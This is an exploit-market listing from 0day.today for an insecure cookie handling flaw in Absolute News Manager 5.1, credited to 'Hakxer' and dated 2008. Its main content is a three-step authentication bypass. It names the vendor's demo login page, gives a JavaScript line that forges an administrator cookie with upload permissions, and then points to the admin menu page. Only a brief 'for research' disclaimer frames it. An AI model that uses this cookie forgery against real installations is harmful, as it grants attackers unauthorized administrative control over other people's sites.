[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Absolute News Manager 5.1 Insecure Cookie Handling Vulnerability

Author
Hakxer
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3982
Category
web applications
Date add
31-10-2008
Platform
unsorted
================================================================
Absolute News Manager 5.1 Insecure Cookie Handling Vulnerability
================================================================


The following procedures (methods) may contain something offensive,they are only for security researches and teaching , at your own risk!

#################################################################################
## Discovered by : Hakxer                                                       #
## Script : Absolute News Manager :http://www.xigla.com/absolutenmnet/demo.htm  #
## Greetz : Allah , Egyptian x Hacker , SQL_Inj4ct0r , Stealth , All my team    #
## Team : EgY Coders Team                                                       #
## ----------------------------Start Exploit----------------------------------- #
## First Go to http://www.xigla.com/absolutenmnet/demo/login.aspx
## Execute JS Code : javascript:document.cookie="xlaANMadmin_demo=usr=1&lvl=2&uniqueid=&permissions=upload,relate";
## Second Go to http://www.xigla.com/absolutenmnet/demo/menu.aspx
## _=END=_
#############################################################################



#  0day.today [2024-11-14]  #